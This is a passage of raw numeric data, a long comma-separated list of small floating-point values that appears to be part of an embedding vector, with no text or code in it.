006390183,0.023350561,0.0061993925,0.007708583,-0.0019096985,0.03526867,0.022910444,-0.0022495391,-0.022251798,-0.004228372,0.012815349,-0.009351168,0.0054463358,0.00031510353,0.03649346,-0.01704291,-0.02976371,0.011291617,-0.008824856,-0.005196885,-0.019247651,-0.0012972641,-0.0702126,-0.008032708,-0.0026424713,0.012088968,0.0070032664,0.038228154,0.0062224246,0.002594592,-0.011270286,0.010563306,-0.0071710004,-0.020967033,-0.014553281,0.0028547226,0.022097902,0.013287464,-0.037935786,-0.0075439997,0.0060228547,-0.021845005,-0.023752231,0.02782098,0.013940227,0.010180551,-0.0014953162,-0.004281436,0.0041039744,-0.003124528,-0.009049465,-0.039682146,0.008528606,0.0056822076,-0.02411491,0.0166086,0.0051894067,-0.009883564,-0.0007612443,-0.02472878,-0.0035276855,-0.010114344,0.02006037,-0.015609231,-0.0138494605,0.008388563,-0.013717064,0.028413486,-0.020507311,0.030425796,0.009804431,0.010710936,0.0043439306,0.004023704,0.0034648199,0.008270411,-0.015738143,0.002333539,0.010427182,0.030661702,0.03107062,-0.009744267,0.014986916,-0.007873437,0.0051389476,-0.026339484,-0.0046523917,0.019171624,0.029385362,-0.0012012161,0.016774409,-0.0017482063,0.009491722,0.007297456,-0.0018519547,0.0031704265,0.0231947,0.01555136,-0.016299281,0.00015932914,0.013780378,0.004825007,-0.00069032866,-0.013936023,-0.018104892,0.03232857,0.0057292515,-0.009570258,0.014023951,-0.016131513,0.01183695,0.01148073,-0.02309693,0.002451305,-0.012087135,-0.02268947,-0.0018746952,-0.0109887095,-0.01527187,-0.05157104,0.023231091,0.012052244,-0.010289099,0.0024365806,-0.0039015233,-0.017289447,-0.0053928834,-0.009374348,-0.034326777,0.00356834,-0.0022376396,0.0026370697,-0.012690232,-0.020464143,0.0044498877,-0.001882445,0.0061931717,0.024779577,-0.014286305,-0.027163185,-0.006938189,-0.02674146,0.0033551925,0.01928603,0.045580458,0.020914486,-0.022529854,-0.0025376147,-0.015416507,-0.0029173475,-0.019785091,-0.0050268997,0.008203088,-0.021366082,0.00418885,-0.02224311,-0.040881794,-0.027155492,0.0041058036,-0.033595,-0.008977584,-0.022659345,0.0050360123,-0.002203074,0.018494168,-0.013969922,0.042903725,0.020660317,-0.005735198,0.011804887,-0.014926876,0.015402434,0.010481486,0.008273998,-0.0013781423,-0.03512335,-0.008796648,0.026452107,0.006044135,0.009712117,0.0026874065,-0.018838726,-0.026698405,-0.008400746,0.0076948414,-0.009118021,0.0146390395,0.015452106,-0.05388125,0.0033765084,0.007605547,0.0052995975,0.009280561,0.011888499,0.0048986757,-0.017710017,0.0009873066,-0.03897885,-0.01065921,0.012412791,-0.021456257,0.011840486,0.0027813914,-0.03971398,-0.00083585444,-0.018986752,0.009908415,0.008395398,0.038361613,-0.012714817,-0.0000017562035,-0.011233978,0.003219456,0.0033908552,-0.0027910627,-0.021492604,-0.009739274,0.0021747355,-0.007129593,-0.014660518,0.009946233,-0.021111343,0.039863676,0.0025926838,-0.0077818213,0.014111911,0.0009054173,0.029464124,0.015067717,0.006867459,0.016080892,-0.012476362,0.0016705358,-0.025565024,0.004832986,0.015591549,0.023365913,0.004870817,-0.013159568,-0.014790623,-0.0329183,-0.022606913,0.01113497,-0.02533657,0.018933538,0.0019203165,0.006454359,0.0023012676,-0.018021539,0.03789125,0.0032240883,0.00059801963,0.0044545806,-0.005129727,-0.018422648,-0.021176381,0.008217584,-0.020462172,-0.003629724,0.006528212,0.015582436,0.010898026,0.028523725,-0.02171397,-0.005255359,-0.0013824546,0.01741971,-0.027372513,0.00048243816,0.015425343,-0.017357413,0.0092456825,0.039114043,-0.010644953,-0.010846115,-0.0008402823,0.017569037,0.012275376,-0.060517926,-0.008828562,-0.019648943,-0.008385699,0.026980333,-0.016807005,0.013989457,-0.023247287,0.014115928,0.013325689,0.020710997,0.011714159,0.0010956144,0.0015898547,0.0035056272,-0.009988301,0.002005428,0.028564945,-0.0048871124,-0.009126025,-0.00055932684,0.007513201,-0.0014646102,0.003745375,0.0011878673,0.008433612,0.020656044,0.008033423,-0.0103863105,-0.03135775,-0.01491831,-0.00090122374,-0.013328748,-0.007285016,-0.012055763,-0.008717439,0.012634302,-0.02356338,-0.012715571,-0.026949415,-0.027485458,0.010681066,-0.028232666,-0.008962523,-0.0065329242,-0.0018364204,0.004916292,0.012124832,0.03831943,0.005268491,0.03296549,-0.007671521,0.0281013,-0.008543501,0.013259539,-0.005269202,-0.012297362,0.010848976,0.00053052325,0.0009179112,-0.0071342615,0.009677483,-0.0017178151,-0.006952312,0.03127679,0.022686342,-0.0036345194,-0.018113028,-0.0039805807,-0.002665944,0.0022785403,0.005330739,-0.011001564,-0.008610129,-0.022378935,0.0023551823,0.0037439829,0.028079988,-0.013412279,-0.0025868854,-0.019180333,-0.0009963545,-0.003267559,0.013189113,-0.023952452,0.0013672749,0.0141359,0.0035205507,0.01932041,-0.017834388,-0.0026237383,-0.016388288,-0.019765593,0.028212095,-0.0010346555,0.0068153995,0.010289974,0.014748618,0.01218676,0.02067575,-0.0033951844,-0.0041799005,0.02912159,0.012390127,-0.007572001,-0.00093481445,0.017780716,0.015690548,-0.018429935,-0.007781133,-0.009106559,0.006626495,0.00971149,-0.008689675,-0.01409703,0.010389472,-0.016947068,-0.013516268,-0.0016329281,-0.035852566,-0.010683106,0.01587369,-0.019716471,0.01655562,-0.019720528,-0.01340566,-0.0033239517,0.007128695,0.026489489,-0.00070913887,-0.028271958,-0.0019107499,0.0109647075,0.018422835,0.031339698,0.013108691,0.0041030943,-0.0021410713,0.002185051,0.014376408,0.0075122397,-0.031869974,0.00063807965,0.0026747682,0.018241882,0.0010388355,-0.018338753,0.01889932,0.006195107,0.0179408,-0.011556635,0.022135021,0.006428596,-0.0011496479,-0.017417796,-0.008519317,-0.0013562795,0.010826564,0.04222566,0.029501155,0.007203888,-0.004118404,0.020536205,-0.003294416,0.0083115315,0.017117674,0.0063355123,0.016442187,-0.015444472,0.025272029,-0.011536362,-0.006819898,0.025362268,0.011429793,-0.00786992,0.029899037,-0.00006798693,-0.015979186,-0.0044627315,-0.0019037783,-0.019159574,0.0037684275,-0.03678422,0.019051261,0.028852543,-0.02489008,-0.0029945278,-0.010996172,0.0055192206,0.014727545,0.007771563,-0.006106909,0.008303689,0.014625458,-0.0066733174,0.0012728298,0.0027817874,0.010709271,0.009192414,-0.0027453948,0.0060950797,-0.015164468,-0.006607593,0.0058812094,-0.010654926,0.0007074747,-0.015500794,-0.014513835,-0.005134466,-0.022383686,-0.008244534,-0.00095469307,-0.00455537,0.048407722,0.0018908469,-0.016992956,0.054197796,-0.005444327,0.0007479922,0.004957778,0.0116528375,0.030113837,-0.0035423618,0.006299543,0.0065545435,-0.009662635,-0.0013458448,-0.0010246508,-0.014029939,-0.0052789627,-0.018198444,-0.022467759,-0.01527987,-0.016759697,-0.012309206,0.005152884,-0.014796125,0.04775651,0.008678103,-0.002516354,0.0018531368,0.0055541946,0.022602223,0.00017809423,-0.018155472,0.020500418,0.019429255,-0.027899403,-0.0008719382,0.015429417,-0.0147449,-0.0134924725,-0.0013729696,-0.0011872177,-0.018473068,-0.0073213098,-0.01360837,-0.009857862,0.030656662,-0.050417952,0.0065713963,0.017591488,0.023724537,0.0013608291,0.001491491,-0.017296307,0.007867261,0.026949456,0.004790079,0.003727062,0.0259977,-0.0036310346,0.030942569,-0.018584566,-0.02401142,0.0149902385,-0.006179573,0.011233085,0.01252683,0.0037364983,-0.0063372473,0.021313455,0.009922192,0.0011661799,0.01424468,0.016876949,0.019610133,-0.0023075547,-0.0027050986,0.002716812,0.0023120157,-0.013043591,0.009891864,-0.020118909,-0.028658133,-0.039675202,-0.026819892,0.0017547915,-0.012647717,-0.004385131,0.0063804705,-0.009784309,-0.0095177125,0.010273761,-0.0055681095,0.016785128,0.027029537,0.0079837525,0.041156463,0.0016593796,0.005935058,0.020391183,0.0110965,0.0005783679,-0.005081936,-0.018041333,-0.01785839,-0.0009413009,0.018900095,0.00589138,-0.000582201,0.00086528633,0.0071211527,-0.025962722,0.017009912,0.022798143,0.0049075005,0.00070590776,0.0030843073,-0.0052235457,-0.011765449,-0.02392183,-0.0033492977,-0.012570508,0.008935003,-0.0049301335,0.003221501,-0.010479471,0.003076047,-0.00052019523,0.06206422,0.022852985,0.016449848,-0.015278826,-0.008373255,-0.010356621,-0.0074860654,0.01119306,0.010276296,0.00425587,-0.018436791,-0.020893123,-0.0069069806,-0.019416982,0.0048422627,-0.0104482155,-0.000836023,0.0132032465,0.010484319,0.0059126564,0.005163453,0.0016251581,-0.008164094,0.0041436083,0.0010659909,0.009217311,0.00087798457,-0.008153078,0.033683024,0.0011162362,-0.0075133024,-0.009498906,-0.005646614,0.009461312,-0.002400079,0.005402355,0.014663563,-0.008107217,0.00558578,-0.014686031,-0.017704898,-0.030427612,0.033758,0.020052064,0.008949797,-0.014267215,-0.016263213,-0.0026686913,0.0034281677,-0.0074810125,-0.0041322936,-0.01592051,-0.012823865,-0.015109188,-0.025710206,0.0015108918,0.0042892694,0.019778417,0.011459701,-0.000055871486,0.008324748,0.019285992,-0.0011462378,0.0069208574,-0.009448238,-0.0024317019,0.025010895,-0.005586713,0.009688906,-0.018430926,0.002732354,0.0029893066,-0.0094207665,0.019747779,0.02101408,0.01781485,0.0028059203,-0.010818556,-0.003570707,-0.0047146827,0.0059399456,-0.0043070433,0.044567432,-0.005692688,0.020032357,0.011556907,0.016964702,-0.0019639912,0.045591086,-0.0020524196,-0.010741795,-0.022401173,-0.01295115,0.013144875,-0.005758676,0.021068553,-0.014069752,0.0037465834,-0.029704975,-0.010649962,-0.010686251,0.0029188595,0.01112311,-0.011018986,0.017783666,0.0038915987,-0.008425596,-0.028206253,0.02692922,0.036790974,0.014274911,-0.008205928,-0.009390648,-0.0054198736,0.0039429227,0.0018863515,-0.008454391,-0.0011959323,-0.009813985,-0.0008898721,0.025930809,0.010656783,-0.011074705,-0.04955613,-0.01833975,0.0948451,0.0132588195,-0.007885891,0.04226619,-0.0068034027,-0.007466566,-0.0907488,-0.0032904986,0.0057502016,-0.014509695,0.005754189,-0.014638393,-0.018526023,0.017471166,0.015518787,-0.021333907,-0.024837464,-0.027690686,0.006065987,-0.014831664,-0.0015829038,0.0020094153,0.010879848,0.0060805343,-0.037700742,-0.0079572825,0.007165013,-0.01321094,0.0005629587,-0.012069636,0.00050184445,0.0135754375,-0.0022567394,-0.02423427,-0.0024255896,0.017298901,0.0051428685,0.02910991,-0.0036247633,0.00077134976,0.020634128,-0.0068207355,-0.023230828,-0.005267013,-0.13884912,0.0035858424,0.025108725,-0.05151572,0.025666287,-0.03463022,-0.0049800132,-0.007234817,-0.0021206716,-0.028335854,0.0033603609,0.0243104,-0.02357226,-0.004810501,-0.018652998,0.011543298,0.0000037579564,0.023505624,-0.00062033645,-0.0156049095,0.0123748975,-0.0050203274,-0.0027454246,-0.01418199,-0.00011643363,0.020141559,0.011261994,0.03406891,0.001166344,0.010373005,-0.014860223,0.012818526,-0.010848237,-0.0017067565,-0.0053773667,-0.044482842,0.0050704847,0.009313985,-0.0051146853,0.023317093,-0.04262063,-0.010306292,-0.011260351,-0.013301048,0.006840146,0.020361021,0.014736526,0.019639833,0.0043503693,0.005478043,0.020571742,-0.004792359,0.007553266,0.02024514,-0.01896551,-0.0015669328,-0.014018079,-0.008830001,0.0006337253,0.006140167,0.0018245897,-0.029685454,-0.0050926288,0.005138522,0.013175036,0.0012672009,-0.009113571,-0.032551453,-0.0031806491,-0.015359994,-0.005688838,0.000028963655,0.012423345,-0.027062224,-0.009254571,0.0127175,-0.008947388,0.010093425,0.0019353625,-0.026600324,0.0029602519,-0.0047347127,0.0043618893,-0.023817232,0.0062731397,-0.0059468816,0.019506076,0.0062460555,-0.012105084,0.0042109075,0.052745406,-0.0018755813,-0.019319162,0.0016554527,-0.0031355852,0.016197536,0.03467804,-0.0033926154,-0.021777207,0.005371495,-0.002161015,-0.009419976,-0.009162559,0.014068351,-0.02972217,0.0060805287,0.012233801,-0.01716466,-0.017124634,-0.0011868669,0.0330947,-0.024625393,0.007121323,0.014649742,-0.031090362,-0.007732708,0.017131818,0.007888174,0.016457932,-0.026094742,-0.02089047,0.008335273,0.014669438,-0.0018300057,0.03820557,-0.03596693,-0.013890113,0.0068406933,-0.0034503962,0.006760081,-0.025159203,0.015819091,-0.012524347,0.004459821,-0.0044087796,0.008106811,-0.0065931533,0.020713083,-0.032746993,0.009261674,-0.020689627,0.0041827913,0.008664739,-0.010209701,-0.0075550126,0.002241182,0.032899212,-0.0089174025,0.023932774,0.006196155,0.002384459,0.016299307,-0.0102887,-0.033543557,0.00440371,0.07199743,0.0029124455,-0.027428122,0.034001842,0.03664572,0.0068831802,0.014290094,-0.017025625,-0.0028282115,-0.02437576,-0.012239311,-0.0012698354,-0.012218322,0.0004992426,-0.027756158,0.004514705,0.011739869,0.012968714,0.009742466,0.015380846,0.016680185,-0.018310625,-0.0152199995,0.021939911,-0.023183357,-0.0011113369,-0.000738173,-0.020066429,0.007926139,0.01905769,0.00050509715,-0.0021733034,-0.006052875,-0.0095200585,0.009058241,-0.024995318,-0.0050008786,0.0058694105,-0.007475461,-0.008542765,0.008670973,0.015939401,0.008075768,-0.021455344,-0.011120049,-0.028343577,-0.0151432175,0.0122304335,0.011509742,0.008613599,-0.0032543873,0.025861276,-0.0036469107,-0.0047628745,0.016179956,0.004143619,-0.010797979,0.017785622,-0.0026572272,-0.0012961777,0.01121771,-0.0017757567,-0.014642945,-0.015178118,-0.00085806486,0.010470976,0.011189446,0.009466399,-0.0014526502,-0.0006417527,-0.009003443,0.0016741727,-0.0035142773,0.038781513,0.0003540355,0.0056974078,-0.0023563178,-0.012219255,-0.0078004166,0.016253768,0.003255608,0.0059778276,0.026078,-0.008593719,-0.00013933073,-0.045346364,0.0005602253,0.025711246,-0.03968594,0.0033358154,-0.012847501,-0.008271063,0.028412042,-0.0062472527,0.020256888,0.012340181,0.019089637,0.022868503,0.028288137,0.00831919,0.0071526803,0.017128808,-0.009027579,-0.027141785,0.012046723,-0.0029062508,-0.022260135,0.0090946155,0.027843801,-0.025700415,-0.011969453,-0.005760579,0.0058136494,-0.014676749,-0.02472035,0.032471623,-0.0045273555,0.010173111,0.011982383,-0.004711164,0.008650775,-0.012611376,0.02073443,0.0017759239,0.048537318,-0.014113771,0.019139014,0.020196903,-0.024271624,-0.0043022134,-0.017658034,0.024197148,0.009126871,-0.00825544,-0.00011525298,-0.0042981654,0.018461345,0.024968049,0.0054335077,0.028287007,-0.0071762456,-0.0097311605,0.006903652,-0.004245497,-0.016710281,0.020765088,0.00874277,-0.017478952,-0.01584672,0.008401865,-0.013061402,0.011260632,-0.009488784,-0.014448096,0.0003759192,0.02644386,-0.0026987735,-0.006868466,-0.02529444,-0.02160681,0.029085182,0.018278535,-0.014418812,-0.011664542,-0.012939115,0.027548052,0.0006957681,-0.014372753,0.007171943,0.002841446,0.015708365,-0.032151468,0.012969369,-0.004364653,0.0014451987,-0.005136688,0.009378827,0.0006821543,0.011805749,-0.022192078,0.007436194,0.009458484,-0.0147277955,-0.0003817526,0.009778762,0.016053224,0.0036186113,0.037235606,-0.010627916,0.0007663856,-0.0059780474,-0.023702892,-0.003950162,-0.015807066,-0.03876909,-0.00033661377,0.016228434,-0.019946989,0.015058313,-0.0075933323,0.0104415985,0.04368222,-0.029173523,-0.015361948,-0.007837826,-0.0022441496,-0.0071963286,-0.018062178,0.010436493,-0.008500831,-0.007413349,-0.007730915,-0.0148027595,0.0035664402,0.0023656471,-0.0018281025,-0.010389993,0.024176953,-0.010897949,-0.034536544,-0.0030886563,-0.02189246,-0.00015337185,-0.0040161605,-0.00059204904,-0.019596877,-0.0031294809,0.044644635,-0.021436226,-0.018854238,-0.0068640593,0.04031384,0.013182083,0.013302523,0.011162724,-0.008621533,-0.01628103,-0.016342727,-0.009816785,0.0006087488,-0.005448715,-0.026372498,-0.0058407625,0.011931391,0.0025076007,0.0021715076,0.0076827845,-0.00453427,0.023423804,0.0071425624,0.017055765,-0.033832707,-0.028255025,-0.008338086,0.023952125,-0.005463115,0.027966782,0.00743577,-0.016973268,-0.025727125,-0.0057385806,-0.027889784,-0.006933449,0.022032142,-0.0059391665,0.0066850553,0.008837265,0.030995134,0.024478868,0.0069942763,0.01331271,0.00525468,-0.023881823,-0.008649281,0.014874829,-0.013566749,0.012393432,-0.022911793,0.014576035,0.012322548,0.021689568,-0.021581102,0.032867346,0.013782135,-0.010322542,-0.03342463,-0.013082553,0.031009844,-0.005869905,-0.008025761,-0.029654257,0.012672943,0.009931147,-0.004534636,-0.020883732,-0.004724955,-0.018472137,0.018601364,0.021167304,0.01502338,0.014919578,0.008437576,-0.0027138707,-0.003122463,0.010976287,-0.01683856,0.028474595,-0.026854508,-0.006878797,-0.007726431,0.013053879,-0.016553368,0.010179492,0.0042202235,0.027167208,-0.0070437607,-0.0036842227,0.024638385,-0.006436503,0.013394923,0.030792708,0.014717629,-0.011248596,-0.0003367955,-0.012620673,-0.007628071,-0.03428332,-0.0008997502,0.009255857,-0.01312213,-0.0055215117,-0.021852251,0.010453193,-0.08570449,0.0023643817,-0.004824248,-0.022989102,-0.0045381007,-0.008900448,-0.00028967136,0.031592786,-0.008571699,-0.02716742,-0.017575083,0.016844854,0.007259372,-0.007579666,-0.0011529651,0.004060729,-0.03442707,0.0077721323,-0.015171042,0.023392016,0.011827881,0.012622946,-0.0012023399,0.020921757,0.0063582635,0.00768645,0.0018052991,0.010505121,-0.023509204,0.011639603,-0.0035587465,0.0018436117,0.00013351523,0.031438086,-0.016920641,0.020187164,0.006316062,0.0085312305,-0.003368208,0.0024359832,-0.008408824,-0.01628161,0.017014597,-0.0030661041,0.014305349,0.019698773,0.022804942,0.02883354,0.02059677,0.013503515,-0.038516287,-0.003139271,0.01070628,0.0066018463,-0.0050402936,0.010576891,0.0036162406,0.010416921,0.007977025,-0.011484174,-0.012884269,0.00053646666,0.01146123,-0.005680851,0.014647851,0.0064836936,-0.00739737,-0.001848335,-0.024942998,0.0036783176,0.009164556,0.020854449,-0.0028820555,0.00591362,0.0002891749,0.0049215774,0.0029066564,-0.0151470555,-0.047559455,0.006657351,-0.026332853,0.00041237913,0.0042914217,0.02812209,-0.025770174,-0.007958939,-0.010602647,0.018867685,0.027643602,0.033539142,0.030330552,-0.010113433,0.009813342,-0.00037903403,-0.005728748,0.0026178746,-0.00006399267,0.021163903,-0.010244768,-0.0123940315,-0.026753787,-0.0060999366,0.0017138864,-0.015581245,-0.15138385,-0.01641557,0.020776661,0.014765549,0.00035892273,-0.019537415,0.02009035,-0.0042607207,0.03747719,0.028307173,-0.02663844,-0.003722238,-0.024028128,0.0027771806,-0.016265426,0.02081961,-0.01944061,-0.0026318415,0.015982807,0.0014846936,0.009413183,-0.0059083267,0.0076646167,0.011123225,-0.007447653,0.011230276,0.024052054,0.039974395,0.015938437,0.01134836,-0.00934396,0.024476828,-0.013373597,-0.014866602,-0.04873117,0.02139946,-0.009908544,-0.02510063,-0.008332531,0.009415276,0.002335366,0.01829371,0.0061868113,0.0150437765,0.009967717,-0.02515917,-0.0047435034,0.025961818,-0.0008816881,-0.0015799948,-0.025266964,-0.007707397,0.012792849,0.010751548,-0.023635786,-0.001028309,-0.0015182749,0.0014698706,0.013487022,0.009901388,0.013605877,0.015189195,0.0059455056,-0.015484902,-0.013678005,0.040575158,-0.0028683702,-0.0007545105,0.0045843874,0.02822999,0.012978912,0.023300964,0.010060167,-0.013511423,0.03514651,-0.023510586,0.0029928186,0.0012126064,0.01736859,0.0079624485,-0.010742809,0.008827704,0.011980369,0.015865088,-0.02738732,-0.0077150543,0.0047971583,-0.0019888198,-0.011041111,-0.00886017,0.005685767,-0.006967505,0.0021167544,0.011320218,0.0006674438,0.019587053,0.04745846,0.0056110173,-0.016495407,-0.011920566,-0.0074945637,0.001412684,0.001406718,-0.02628259,-0.017424677,0.032621954,0.036466714,-0.030869076,0.017550278,-0.0012610729,0.015244358,0.017646603,0.0038841178,0.010406796,0.004794694,-0.0073246513,-0.0034745967,0.007195645,-0.03514554,-0.022048635,0.008215141,0.044635616,-0.0109286215,-0.014986509,0.010814955,-0.020180115,-0.011693717,0.012296614,-0.01661238,-0.031151898,-0.002611224,-0.0074593057,0.01344457,-0.007205577,0.0025285776,0.0028691276,0.0073334146,0.0043758545,0.016252948,0.004176826,-0.016835082,0.003587117,-0.007313252,-0.0013143161,-0.010132289,-0.01072344,-0.015395942,0.0015687873,0.010576457,0.001715286,-0.002937739,-0.005650644,0.0087617915,0.023079626,-0.0034761517,0.011437029,-0.007819692,0.0072334553,0.014511231,0.0013011292,0.0016127935,-0.0066954405,0.021457471,0.010920464,-0.0120941615,0.00831598,0.0034452174,-0.005805955,0.004208568,0.014637293,0.013454879,-0.01922794,0.011945658,-0.0334705,0.0042612986,-0.016611824,0.015231296,-0.0020686141,0.012247805,0.016615398,0.009974113,0.0034443256,-0.007215477,0.00701566,-0.0072101476,0.020162888,-0.0124942325,0.0018755369,-0.0039337776,0.0011764714,0.015436998,-0.0015098763,0.013063629,0.0002864102,-0.0015555015,-0.0034637146,0.0009863088,0.007050853,0.017128274,-0.0026406574,-0.011602185,0.00751567,0.005179606,-0.003401856,0.015615652,-0.013001128,0.0036209691,0.013585703,-0.0093572065,-0.006594553,-0.01278342,0.02167639,0.0042070774,-0.0020705548,-0.00407776,0.037203096,-0.010464416,-0.006593149,0.023548696,0.011083463,-0.01335974,-0.009262805,0.009402019,0.007320659,-0.022870332,0.02815448,0.003972304,0.034921326,-0.027155997,-0.023951396,0.0041351337,0.01615932,-0.041254684,-0.012972566,-0.013801712,-0.0027629202,0.015365272,-0.009431226,0.0042012194,0.010944333,0.012515284,-0.009658077,0.015538658,0.023052908,0.019306088,0.004116614,0.006393425,-0.021113036,0.02154913,0.034402743,-0.0070150653,-0.0013272612,-0.0032756152,0.0013858795,0.0060558375,0.020914119,0.00913259,-0.00016622158,-0.0073756664,0.030913455,-0.024735134,0.008273176,-0.022802202,-0.0025949597,-0.02543394,0.005011939,0.005060447,-0.013953786,0.011686717,0.0010996291,0.00067982526,-0.0021379387,-0.0020290352,0.024429157,-0.022131583,0.0029960433,-0.0016306187,0.005079193,0.018707693,-0.0017627819,-0.002221899,-0.008783828,0.0011752757,0.020366255,0.009655907,-0.002876653,-0.00076284364,-0.009980163,-0.0027824373,0.015127771,0.032014113,-0.027014898,-0.004065516,-0.027285868,0.0025253287,0.010385758,-0.0017815138,0.0018816768,-0.009019665,0.021136193,-0.0045053195,-0.02648768,-0.0068246955,-0.015493592,0.010764748,-0.0036994042,-0.010420773,-0.0023200086,-0.009591684,0.005220451,-0.013206852,0.0025043488,0.0022450523,0.004586901,0.009229546,-0.009306125,-0.012879114,-0.004151084,-0.019909363,-0.027293611,-0.011953139,-0.031187424,0.0010158891,-0.012254353,0.0030814973,0.0003762859,0.025270304,0.017091157,-0.0065371515,0.00041864123,0.012886847,0.06768858,-0.009573722,0.0036750988,0.028194748,0.0066950186,0.0398885,0.03101316,-0.023082146,0.006359229,0.0013367308,-0.00047405006,-0.007144299,-0.0072889403,-0.0051611336,0.017229585,0.0025854728,0.0154089695,0.021865096,0.00727897,0.009939039,0.00086082116,-0.0074377144,0.0052115414,-0.0033318473,-0.0043762787,-0.019225338,0.0021898705,-0.0046450873,0.021410976,-0.015665578,-0.013156636,0.0000058263645,-0.02723357,-0.0017751595,-0.0048282887,-0.02626972,0.018165011,-0.031683516,0.0089305295,-0.017931677,0.02080929,-0.008427976,-0.02466956,-0.004270335,-0.09834876,0.014719958,0.023654584,0.0018651236,0.02341894,0.01022176,-0.0026536433,-0.012288127,-0.012120625,0.027444344,0.0067509282,-0.022575757,0.0022016861,0.011835766,0.01441089,-0.0017023624,-0.01939229,-0.016433567,-0.0037506854,-0.029508082,0.007177132,-0.00864879,-0.024543334,-0.022531703,-0.0027685675,-0.016344728,-0.0018000131,0.006613507,0.005540773,-0.0018253,0.018144242,-0.0063064494,0.0021526993,-0.0071447715,-0.007956031,0.013983572,-0.00809235,0.009570777,-0.018123932,-0.048204463,0.0038892408,-0.0032004525,0.0053979773,0.011836545,-0.012044446,0.01737877,-0.009973012,0.021790154,0.012917792,-0.0019341573,-0.008004081,0.014728749,-0.0038310643,0.021646267,-0.0062651285,-0.004177108,0.0068146973,-0.006028288,0.01520603,0.0048881783,0.02149891,0.016402544,0.008097207,-0.029959403,-0.0010394604,-0.0080304155,0.0016349099,0.036261376,-0.02410152,-0.012501166,0.030755365,-0.024742052,0.0002500011,-0.018433664,-0.019519448,-0.014928843,0.014257815,-0.012664009,-0.0038445888,0.016633555,0.04487403,-0.00505433,-0.010259613,0.02390296,-0.004269,0.0017886664,0.007040794,-0.009031568,0.013951445,0.014299215,-0.0038473783,0.010742374,0.015774034,-0.0011484849,0.0053161406,-0.0014720737,-0.0043014647,0.006312123,-0.0010838357,0.004207647,0.013772267,0.010771215,0.0035752852,0.010999373,-0.017416552,-0.0023933714,-0.012373224,-0.013442771,-0.008439972,0.0032116778,0.0040478716,0.008699806,0.023722464,0.020898081,0.008471349,0.02562028,-0.015662473,0.030382682,0.01970189,-0.038398355,0.0019262524,-0.014178772,-0.0087084165,0.046299133,0.017601069,-0.003830506,0.021653866,-0.018342838,-0.00030360906,0.007853053,-0.029718392,0.0304519,-0.0061485143,0.0043613208,-0.0059435316,0.0116720535,0.0067148795,0.03706839,0.018846024,0.014320729,-0.010988771,-0.028410848,0.008325457,-0.0086319335,-0.015374051,0.034104034,-0.037064668,0.0014560105,0.017399617,0.0072714044,-0.01603788,0.011532479,-0.021929374,-0.007657216,-0.012855082,-0.010266865,0.015304421,-0.009889677,-0.006312531,0.019101584,0.0067571593,0.046187785,-0.004680323,-0.0038538321,-0.008607219,-0.0031379682,0.0068138908,0.0019039982,-0.011161258,-0.024340048,0.0074386364,-0.018278513,0.01257316,-0.014446926,-0.01841837,0.017382115,-0.018565638,0.039951768,-0.010817218,0.022123013,-0.02813515,0.011836194,-0.005164045,-0.0051200837,-0.015983224,-0.01823648,0.0038231798,0.0053364923,0.014412456,0.019876394,0.017738063,-0.0066619394,-0.009134163,-0.021617124,0.0046096924,-0.00068928325,0.00086277537,-0.008296639,-0.023509806,0.008789187,-0.0134616215,0.0271842,-0.00090903946,-0.005267664,0.03141825,0.00021535094,-0.0058452915,0.009089814,-0.012905776,-0.00722706,-0.0059082294,-0.009758889,0.017371083,0.14166526,0.020447271,-0.02661682,0.0034912496,-0.010199174,-0.026463404,0.015721465,-0.0093785515,0.017839415,-0.0025406939,0.02033586,-0.00072586833,0.008090372,-0.010998732,0.0052293465,0.02027429,0.0007900038,-0.032411933,0.008804044,0.007922064,0.032033376,-0.021599945,0.011536372,-0.035210736,0.0045436244,-0.06575925,0.017771358,0.0027405496,0.004072847,0.018260745,0.012071354,-0.011255644,0.015880033,0.012271121,-0.0038710902,-0.0031005265,-0.00096565037,-0.012757309,0.0058897887,0.0046360954,0.014077658,-0.0142196845,0.006373314,-0.033986036,-0.010124065,-0.0063738255,0.0035592816,-0.023881702,-0.020619083,-0.005258355,0.0007084125,0.012446362,-0.01038862,-0.012013462,0.037219048,0.00164004,-0.008709534,0.0099677835,0.01035415,-0.027054433,0.0023148642,-0.0008262337,-0.004903388,-0.00047486657,0.020494606,0.006898106,-0.005360626,-0.0057168175,-0.00019737713,-0.015613693,0.008053966,0.0042469446,0.0059712497,0.0024842771,-0.0059515685,0.0026109621,-0.0083184345,-0.011990301,0.0034159245,-0.016841913,-0.0074458523,-0.0009943907,0.013371228,0.009421616,-0.0058739623,-0.006105778,-0.012167297,0.040737513,-0.0003145076,-0.018700128,-0.0074217673,0.03826021,0.016071208,0.013910895,-0.023254173,-0.024025269,0.00881355,0.0029528823,-0.029690385,0.011923838,-0.020286426,0.0015744943,0.0005903342,0.016113846,-0.0044840435,-0.0089860475,-0.0043632607,0.007081458,-0.011834845,-0.007978607,-0.015127717,0.00012855834,0.011802196,0.008744484,0.017855903,0.020602848,-0.007710373,-0.011493218,0.010799308,-0.024917593,-0.00015317294,-0.010709142,0.02071237,0.02894691,0.0066082077,0.005109079,-0.019031027,0.00035715854,-0.015030747,0.0078053097,-0.0030511005,-0.026013626,-0.012426776,0.010303731,0.0014872947,-0.013548987,0.024338612,-0.012140706,-0.0051933634,-0.013861715,0.016136028,-0.0109556,-0.0009498395,-0.019730091,0.019678093,-0.026673635,0.008737794,-0.012878335,-0.0061934334,0.032657653,0.01619635,0.010809813,-0.01606709,-0.0051524616,-0.011703816,-0.021342784,-0.003032576,-0.010675103,-0.012547835,0.0109833935,0.03532925,-0.003199248,-0.0005230553,-0.045782804,0.019965978,0.0049957274,0.030859092,0.018805096,0.005284917,0.0086397985,-0.01385877,-0.017787835,0.0065174415,0.022591835,-0.0060885316,0.006076069,0.021401087,0.0063909935,-0.008846243,-0.012331223,0.015578771,0.009064495,-0.009332982,-0.022677416,0.025514148,-0.008029559,0.024663039,0.014279515,-0.00513462,0.001423849,-0.0251392,0.008579118,-0.01547634,0.018130278,0.020205516,0.013136513,-0.009517401,0.01890926,-0.0236487,-0.025964787,-0.016014649,-0.008423319,0.016504878,-0.0058006896,0.019255081,-0.012469415,0.0015306498,-0.010570882,0.009651129,0.014695769,-0.008849963,0.00899499,-0.010130981,-0.03643997,0.023356978,-0.0028570383,-0.0043040607,-0.03585908,-0.02765639,-0.0157938,0.0017841408,0.0017400382,-0.024806201,-0.0005780409,0.012848087,0.0006807473,-0.012709219,0.017548632,0.017933566,-0.022189572,-0.0014478189,0.011113474,-0.008151809,0.004131002,-0.021788595,0.00015312193,0.025653325,0.039184887,-0.0036058172,0.004912234,-0.00498341,0.0036196334,0.